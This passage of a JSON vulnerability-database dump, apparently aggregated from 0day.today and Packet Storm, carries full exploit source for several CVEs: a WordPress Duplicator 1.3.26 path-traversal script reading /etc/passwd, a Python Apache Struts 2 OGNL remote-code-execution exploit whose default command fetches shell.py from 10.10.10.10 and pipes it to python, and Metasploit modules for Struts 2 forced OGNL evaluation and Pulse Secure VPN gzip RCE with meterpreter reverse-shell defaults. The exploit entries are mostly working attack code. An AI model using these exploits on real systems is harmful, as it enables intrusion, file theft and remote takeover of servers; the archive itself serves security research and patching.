"zdt", "title": "Wordpress Duplicator 1.3.26 Plugin - Unauthenticated Arbitrary 
File Read Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], "modified": "2021-10-18T00:00:00", "id": "1337DAY-ID-36914", "href": "https://0day.today/exploit/description/36914", "sourceData": "# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read\n# Exploit Author: nam3lum\n# Vendor Homepage: https://wordpress.org/plugins/duplicator/\n# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]\n# Version: 1.3.26\n# Tested on: Ubuntu 16.04\n# CVE : CVE-2020-11738\n\nimport requests as re\nimport sys\n\nif len(sys.argv) != 3:\n print(\"Exploit made by nam3lum.\")\n print(\"Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd\")\n exit()\n\narg = sys.argv[1]\nfile = sys.argv[2]\n\nURL = arg + \"/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../..\" + file\n\noutput = re.get(url = URL)\nprint(output.text)\n", "sourceHref": "https://0day.today/exploit/36914", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-09-28T17:09:23", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, 
"impactScore": 5.9}, "published": "2020-11-17T00:00:00", "type": "zdt", "title": "Apache Struts 2.5.20 - Double OGNL evaluation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2020-0230"], "modified": "2020-11-17T00:00:00", "id": "1337DAY-ID-35263", "href": "https://0day.today/exploit/description/35263", "sourceData": "# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation\n# Exploit Author: West Shepherd\n# Vendor Homepage: https://struts.apache.org/download.cgi\n# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059)\n# CVE : CVE-2019-0230\n# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF.\n# Source(s):\n# https://github.com/PrinceFPF/CVE-2019-0230\n# https://cwiki.apache.org/confluence/display/WW/S2-059\n# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22\n\n# !/usr/bin/python\nfrom sys import argv, exit, stdout, stderr\nimport argparse\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nimport logging\n\n\nclass Exploit:\n def __init__(\n self,\n target='',\n redirect=False,\n proxy_address=''\n ):\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n self.target = target\n self.session = requests.session()\n self.redirect = redirect\n self.timeout = 0.5\n self.proxies = {\n 'http': 'http://%s' % proxy_address,\n 'https': 'http://%s' % proxy_address\n } \\\n if proxy_address is not None \\\n 
and proxy_address != '' else {}\n self.query_params = {}\n self.form_values = {}\n self.cookies = {}\n boundary = \"---------------------------735323031399963166993862150\"\n self.headers = {\n 'Content-Type': 'multipart/form-data; boundary=%s' % boundary,\n 'Accept': '*/*',\n 'Connection': 'close'\n }\n payload = \"%{(#nike='multipart/form-data').\" \\\n \"(#[email\u00a0protected]@DEFAULT_MEMBER_ACCESS).\" \\\n \"(#_memberAccess?(#_memberAccess=#dm):\" \\\n\n\"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\"\n\\\n\n\"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\"\n\\\n \"(#ognlUtil.getExcludedPackageNames().clear()).\" \\\n \"(#ognlUtil.getExcludedClasses().clear()).\" \\\n \"(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}').\" \\\n\n\"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).\"\n\\\n\n\"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).\" \\\n \"(#p=new\njava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).\" \\\n\n\"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\"\n\\\n\n\"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).\"\n\\\n \"(#ros.flush())}\"\n\n self.payload = \"--%s\\r\\nContent-Disposition: form-data;\nname=\\\"foo\\\"; \" \\\n \"filename=\\\"%s\\0b\\\"\\r\\nContent-Type:\ntext/plain\\r\\n\\r\\nx\\r\\n--%s--\\r\\n\\r\\n\" % (\n boundary, payload, boundary\n )\n\n def do_get(self, url, params=None, data=None):\n return self.session.get(\n url=url,\n verify=False,\n allow_redirects=self.redirect,\n headers=self.headers,\n cookies=self.cookies,\n proxies=self.proxies,\n data=data,\n params=params\n )\n\n def do_post(self, url, data=None, params=None):\n return self.session.post(\n url=url,\n data=data,\n verify=False,\n allow_redirects=self.redirect,\n headers=self.headers,\n cookies=self.cookies,\n proxies=self.proxies,\n params=params\n )\n\n 
def debug(self):\n try:\n import http.client as http_client\n except ImportError:\n import httplib as http_client\n http_client.HTTPConnection.debuglevel = 1\n logging.basicConfig()\n logging.getLogger().setLevel(logging.DEBUG)\n requests_log = logging.getLogger(\"requests.packages.urllib3\")\n requests_log.setLevel(logging.DEBUG)\n requests_log.propagate = True\n return self\n\n def send_payload(self, command='curl --insecure -sv\nhttps://10.10.10.10/shell.py|python -'):\n url = self.target\n stdout.write('sending payload to %s payload %s' % (url, command))\n resp = self.do_post(url=url, params=self.query_params,\ndata=self.payload.replace('{COMMAND}', command))\n return resp\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(add_help=True,\n description='CVE-2020-0230 Struts\n2 exploit')\n try:\n parser.add_argument('-target', action='store', help='Target\naddress: http(s)://target.com/index.action')\n parser.add_argument('-command', action='store',\n help='Command to execute: touch /tmp/pwn')\n parser.add_argument('-debug', action='store', default=False,\nhelp='Enable debugging: False')\n parser.add_argument('-proxy', action='store', default='',\nhelp='Enable proxy: 10.10.10.10:8080')\n\n if len(argv) == 1:\n parser.print_help()\n exit(1)\n options = parser.parse_args()\n\n exp = Exploit(\n proxy_address=options.proxy,\n target=options.target\n )\n\n if options.debug:\n exp.debug()\n stdout.write('target %s debug %s proxy %s\\n' % (\n options.target, options.debug, options.proxy\n ))\n\n result = exp.send_payload(command=options.command)\n stdout.write('Response: %d\\n' % result.status_code)\n\n except Exception as error:\n\nstderr.write('error in main %s' % str(error))\n", "sourceHref": "https://0day.today/exploit/35263", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-12-24T21:49:19", "description": "", "cvss3": {}, "published": "2020-12-24T00:00:00", "type": "packetstorm", "title": "Apache 
Struts 2 Forced Multi OGNL Evaluation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2020-17530"], "modified": "2020-12-24T00:00:00", "id": "PACKETSTORM:160721", "href": "https://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Apache Struts 2 Forced Multi OGNL Evaluation', \n'Description' => %q{ \nThe Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags \nattributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a \ntag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). \n \nThis vulnerability is application dependant. A server side template must make an affected use of request data to \nrender an HTML tag attribute. 
\n}, \n'Author' => [ \n'Spencer McIntyre', # Metasploit module \n'Matthias Kaiser', # discovery of CVE-2019-0230 \n'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2020-17530 \n'ka1n4t', # PoC of CVE-2020-17530 \n], \n'References' => [ \n['CVE', '2019-0230'], \n['CVE', '2020-17530'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-059'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-061'], \n['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-059'], \n['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-061'], \n['URL', 'https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2'], \n['URL', 'https://github.com/ka1n4t/CVE-2020-17530'], \n], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DisclosureDate' => '2020-09-14', # CVE-2019-0230 NVD publication date \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE, ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ], \n'Reliability' => [ REPEATABLE_SESSION, ] \n}, \n'DefaultTarget' => 0 \n) \n) \n \nregister_options([ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]), \nOptString.new('NAME', [ true, 'The HTTP query parameter or form data name', 'id']), \nOptEnum.new('CVE', [ true, 'Vulnerability to use', 'CVE-2020-17530', ['CVE-2020-17530', 'CVE-2019-0230']]) \n]) \nregister_advanced_options([ \nOptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]), \nOptString.new('HttpCookie', [false, 'An optional cookie to include when making the HTTP request']) \n]) \nend \n \ndef check \nnum1 = rand(1000..9999) \nnum2 = rand(1000..9999) \n \nres = 
send_request_cgi(build_http_request(datastore['CVE'], \"#{num1}*#{num2}\")) \nif res.nil? \nreturn CheckCode::Unknown \nelsif res.body.scan(/([\"'])\\s*#{(num1 * num2)}\\s*\\1/).empty? \nreturn CheckCode::Safe \nend \n \nreturn CheckCode::Appears \nend \n \ndef exploit \ncve = datastore['CVE'] \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']} using #{cve}\") \n \nif cve == 'CVE-2019-0230' \nognl = [] \nognl << '#context=#attr[\\'struts.valueStack\\'].context' \nognl << '#container=#context[\\'com.opensymphony.xwork2.ActionContext.container\\']' \nognl << '#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)' \nognl << '#ognlUtil.setExcludedClasses(\\'\\')' \nognl << '#ognlUtil.setExcludedPackageNames(\\'\\')' \nres = send_request_cgi(build_http_request(cve, ognl)) \nfail_with(Failure::UnexpectedReply, 'Failed to execute the OGNL preamble') unless res&.code == 200 \nend \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded, { cve: cve }) \nwhen :linux_dropper \nexecute_cmdstager({ cve: cve, delay: datastore['CMDSTAGER::DELAY'], linemax: 512 }) \nend \nend \n \ndef execute_command(cmd, opts = {}) \nsend_request_cgi(build_http_request(opts[:cve], build_ognl(opts[:cve], cmd)), 5) \nend \n \ndef build_http_request(cve, ognl) \nognl = ognl.map { |part| \"(#{part})\" }.join('.') if ognl.is_a? Array \n \nhttp_request_parameters = { 'uri' => normalize_uri(target_uri.path) } \nhttp_request_parameters['cookie'] = datastore['HttpCookie'] unless datastore['HttpCookie'].blank? 
\nif cve == 'CVE-2019-0230' \nhttp_request_parameters['method'] = 'GET' \nhttp_request_parameters['vars_get'] = { datastore['NAME'] => \"%{#{ognl}}\" } \nelsif cve == 'CVE-2020-17530' \nhttp_request_parameters['method'] = 'POST' \nhttp_request_parameters['vars_post'] = { datastore['NAME'] => \"%{#{ognl}}\" } \nend \nhttp_request_parameters \nend \n \ndef build_ognl(cve, cmd) \ncmd = \"bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash\" \nognl = [] \nif cve == 'CVE-2019-0230' \nognl << '#context=#attr[\\'struts.valueStack\\'].context' \nognl << '#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)' \nognl << \"@java.lang.Runtime@getRuntime().exec(\\\"#{cmd}\\\")\" \nelsif cve == 'CVE-2020-17530' \nognl << '#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]' \nognl << '#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]' \nognl << '#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")' \nognl << '#bean.setBean(#stack)' \nognl << '#context=#bean.get(\"context\")' \nognl << '#bean.setBean(#context)' \nognl << '#macc=#bean.get(\"memberAccess\")' \nognl << '#bean.setBean(#macc)' \nognl << '#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")' \nognl << '#bean.put(\"excludedClasses\",#emptyset)' \nognl << '#bean.put(\"excludedPackageNames\",#emptyset)' \nognl << '#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")' \nognl << \"#execute.exec({\\\"#{cmd}\\\"})\" \nend \n \nognl \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/160721/struts2_multi_eval_ognl.rb.txt"}, {"lastseen": "2020-12-18T19:20:49", "description": "", "cvss3": {}, "published": "2020-12-18T00:00:00", "type": "packetstorm", "title": "Pulse Secure VPN Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-8260"], "modified": "2020-12-18T00:00:00", "id": 
"PACKETSTORM:160619", "href": "https://packetstormsecurity.com/files/160619/Pulse-Secure-VPN-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \nENCRYPTION_KEY = \"\\x7e\\x95\\x42\\x1a\\x6b\\x88\\x66\\x41\\x43\\x1b\\x32\\xc5\\x24\\x42\\xe2\\xe4\\x83\\xf8\\x1f\\x58\\xb0\\xe9\\xe9\\xa5\".b \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Pulse Secure VPN gzip RCE', \n'Description' => %q{ \nThe Pulse Connect Secure appliance before 9.1R9 suffers from an uncontrolled gzip extraction vulnerability \nwhich allows an attacker to overwrite arbitrary files, resulting in Remote Code Execution as root. \nAdmin credentials are required for successful exploitation. \nOf note, MANY binaries are not in `$PATH`, but are located in `/home/bin/`. 
\n}, \n'Author' => [ \n'h00die', # msf module \n'Spencer McIntyre', # msf module \n'Richard Warren <richard.warren@nccgroup.com>', # original PoC, discovery \n'David Cash <david.cash@nccgroup.com>', # original PoC, discovery \n], \n'References' => [ \n['URL', 'https://gist.github.com/rxwx/03a036d8982c9a3cead0c053cf334605'], \n['URL', 'https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/'], \n['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601'], \n['CVE', '2020-8260'] \n], \n'DisclosureDate' => '2020-10-26', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix In-Memory', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_memory, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' } \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' } \n} \n] \n], \n'Payload' => { 'Compat' => { 'ConnectionType' => '-bind' } }, \n'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'CMDSTAGER::FLAVOR' => 'curl' }, \n'DefaultTarget' => 1, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES], \n'RelatedModules' => ['auxiliary/gather/pulse_secure_file_disclosure'] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The URI of the application', '/']), \nOptString.new('USERNAME', [true, 'The username to login with', 'admin']), \nOptString.new('PASSWORD', [true, 'The password to login with', '123456']) \n]) \n \nregister_advanced_options([ \nOptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 1.5 ]), \n]) \nend \n \ndef check(exploiting: false) \nlogin \nres = 
send_request_cgi({ 'uri' => normalize_uri('dana-admin', 'misc', 'admin.cgi') }) \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless res&.code == 200 \nversion = res.body.scan(%r{id=\"span_stats_counter_total_users_count\"[^>]+>([^<(]+)(?:\\(build (\\d+)\\))?</span>})&.last \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless version \nversion, build = version \n \nreturn CheckCode::Unknown unless version.include?('R') \n \nversion, revision = version.split('R', 2) \nprint_status(\"Version #{version.strip}, revision #{revision.strip}, build #{build.strip} found\") \nreturn CheckCode::Appears if version.to_f <= 9.1 && revision.to_f < 9 \n \nCheckCode::Detected \nrescue Msf::Exploit::Failed \nCheckCode::Unknown \nensure \nlogout unless exploiting \nend \n \ndef exploit \ncase (checkcode = check(exploiting: true)) \nwhen Exploit::CheckCode::Vulnerable, Exploit::CheckCode::Appears \nprint_good(checkcode.message) \nwhen Exploit::CheckCode::Detected \nprint_warning(checkcode.message) \nelse \nfail_with(Module::Failure::Unknown, checkcode.message.to_s) \nend \n \ncase target['Type'] \nwhen :unix_memory \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager( \nlinemax: 262144, # 256KiB \ndelay: datastore['CMDSTAGER::DELAY'] \n) \nend \n \nlogout \nend \n \ndef execute_command(command, _opts = {}) \ntrigger = Rex::Text.rand_text_alpha_upper(8) \nprint_status(\"Exploit trigger will be at #{normalize_uri('dana-na', 'auth', 'setcookie.cgi')} with a header of #{trigger}\") \n \nconfig = build_malicious_config(command, trigger) \nres = upload_config(config) \n \nfail_with(Failure::UnexpectedReply, 'File upload failed') unless res&.code == 200 \n \nprint_status('Triggering RCE') \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'setcookie.cgi'), \n'headers' => { trigger => trigger } \n}) \nend \n \ndef res_get_xsauth(res) 
\nres.body.scan(%r{name=\"xsauth\" value=\"([^\"]+)\"/>})&.last&.first \nend \n \ndef upload_config(config) \nprint_status('Requesting backup config page') \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi'), \n'headers' => { 'Referer' => \"#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system\" }, \n'vars_get' => { 'type' => 'system' } \n}) \nfail_with(Failure::UnexpectedReply, 'Failed to request the backup configuration page') unless res&.code == 200 \nxsauth = res_get_xsauth(res) \nfail_with(Failure::UnexpectedReply, 'Failed to get the xsauth token') if xsauth.nil? \n \npost_data = Rex::MIME::Message.new \npost_data.add_part(xsauth, nil, nil, 'form-data; name=\"xsauth\"') \npost_data.add_part('Import', nil, nil, 'form-data; name=\"op\"') \npost_data.add_part('system', nil, nil, 'form-data; name=\"type\"') \npost_data.add_part('8', nil, nil, 'form-data; name=\"optWhat\"') \npost_data.add_part('', nil, nil, 'form-data; name=\"txtPassword1\"') \npost_data.add_part('Import Config', nil, nil, 'form-data; name=\"btnUpload\"') \npost_data.add_part(config, 'application/octet-stream', 'binary', 'form-data; name=\"uploaded_file\"; filename=\"system.cfg\"') \n \nprint_status('Uploading encrypted config backup') \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'import.cgi'), \n'method' => 'POST', \n'headers' => { 'Referer' => \"#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system\" }, \n'data' => post_data.to_s, \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\" \n}) \nend \n \ndef login \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'), \n'method' => 'POST', \n'vars_post' => { \n'tz_offset' => '-300', \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'], \n'realm' => 'Admin Users', \n'btnSubmit' => 'Sign In' \n}, \n'keep_cookies' => true 
\n}) \n \nfail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 302 \nlocation = res.headers['Location'] \nfail_with(Failure::NoAccess, 'Login failed') if location.include?('failed') \n \nreturn unless location.include?('admin%2Dconfirm') \n \n# if the account we login with is already logged in, or another admin is logged in, a warning is displayed. Click through it. \nprint_status('Other admin sessions detected, continuing') \nres = send_request_cgi({ 'uri' => location, 'keep_cookies' => true }) \nfail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200 \nfds = res.body.scan(/name=\"FormDataStr\" value=\"([^\"]+)\">/).last \nxsauth = res_get_xsauth(res) \nfail_with(Failure::UnexpectedReply, 'Login failed (missing form elements)') unless fds && xsauth \n \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'), \n'method' => 'POST', \n'vars_post' => { \n'btnContinue' => 'Continue the session', \n'FormDataStr' => fds.first, \n'xsauth' => xsauth \n}, \n'keep_cookies' => true \n}) \nfail_with(Failure::UnexpectedReply, 'Login failed') unless res \nend \n \ndef logout \nprint_status('Logging out to prevent warnings to other admins') \nres = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi') }) \nfail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 200 \n \nlogout_uri = res.body.scan(%r{/dana-na/auth/logout\\.cgi\\?xsauth=\\w+}).first \nfail_with(Failure::UnexpectedReply, 'Logout failed') if logout_uri.nil? 
\n \nres = send_request_cgi({ 'uri' => logout_uri }) \nfail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 302 \nend \n \ndef build_malicious_config(cmd, trigger) \npayload_script = \"#{Rex::Text.rand_text_alphanumeric(rand(6..13))}.sh\" \nperl = <<~PERL \nif (length $ENV{HTTP_#{trigger}}){ \nchmod 0775, \"/data/var/runtime/tmp/tt/#{payload_script}\"; \nsystem(\"env /data/var/runtime/tmp/tt/#{payload_script}\"); \n} \nPERL \ntarfile = StringIO.new \nGem::Package::TarWriter.new(tarfile) do |tar| \ntar.mkdir('tmp', 509) \ntar.mkdir('tmp/tt', 509) \ntar.add_file('tmp/tt/setcookie.thtml.ttc', 511) do |tio| \ntio.write perl \nend \ntar.add_file(\"tmp/tt/#{payload_script}\", 511) do |tio| \ntio.write \"PATH=/home/bin:$PATH\\n\" \ntio.write \"rm -- \\\"$0\\\"\\n\" \ntio.write cmd \nend \nend \n \ngzfile = StringIO.new \ngz = Zlib::GzipWriter.new(gzfile) \ngz.write(tarfile.string) \ngz.close \n \nencrypt_config(gzfile.string) \nend \n \ndef encrypt_config(config_blob) \ncipher = OpenSSL::Cipher.new('DES-EDE3-CFB').encrypt \niv = cipher.iv = cipher.random_iv \ncipher.key = ENCRYPTION_KEY \n \nmd5 = OpenSSL::Digest.new('MD5', \"#{iv}\\x00#{[config_blob.length].pack('V')}\") \n \nciphertext = cipher.update(config_blob) \nciphertext << cipher.final \nmd5 << ciphertext \n \ncipher.reset \n\"\\x09#{iv}\\x00#{[ciphertext.length].pack('V') + ciphertext + cipher.update(md5.digest) + cipher.final}\" \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/160619/pulse_secure_gzip_rce.rb.txt"}, {"lastseen": "2021-10-18T15:36:22", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-18T00:00:00", "type": "packetstorm", "title": "WordPress Duplicator 1.3.26 Arbitrary File Read", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], "modified": "2021-10-18T00:00:00", "id": "PACKETSTORM:164533", "href": "https://packetstormsecurity.com/files/164533/WordPress-Duplicator-1.3.26-Arbitrary-File-Read.html", "sourceData": "`# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read \n# Date: October 16, 2021 \n# Exploit Author: nam3lum \n# Vendor Homepage: https://wordpress.org/plugins/duplicator/ \n# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip \n# Version: 1.3.26 \n# Tested on: Ubuntu 16.04 \n# CVE : CVE-2020-11738 \n \nimport requests as re \nimport sys \n \nif len(sys.argv) != 3: \n    print(\"Exploit made by nam3lum.\") \n    print(\"Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd\") \n    exit() \n \narg = sys.argv[1] \nfile = sys.argv[2] \n \nURL = arg + \"/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../..\" + file \n \noutput = re.get(url = URL) \nprint(output.text) \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/164533/wpduplicator1326-fileread.txt"}, {"lastseen": "2020-12-18T19:23:24", "description": "", "cvss3": {}, "published": 
"2020-12-18T00:00:00", "type": "packetstorm", "title": "WordPress Duplicator 1.3.26 Directory Traversal / File Read", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11738"], "modified": "2020-12-18T00:00:00", "id": "PACKETSTORM:160621", "href": "https://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Auxiliary::Report \ninclude Msf::Exploit::Remote::HTTP::Wordpress \ninclude Msf::Auxiliary::Scanner \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'WordPress Duplicator File Read Vulnerability', \n'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability in the WordPress plugin 'Duplicator', versions 1.3.24-1.3.26, allowing arbitrary file read with the web server's privileges. 
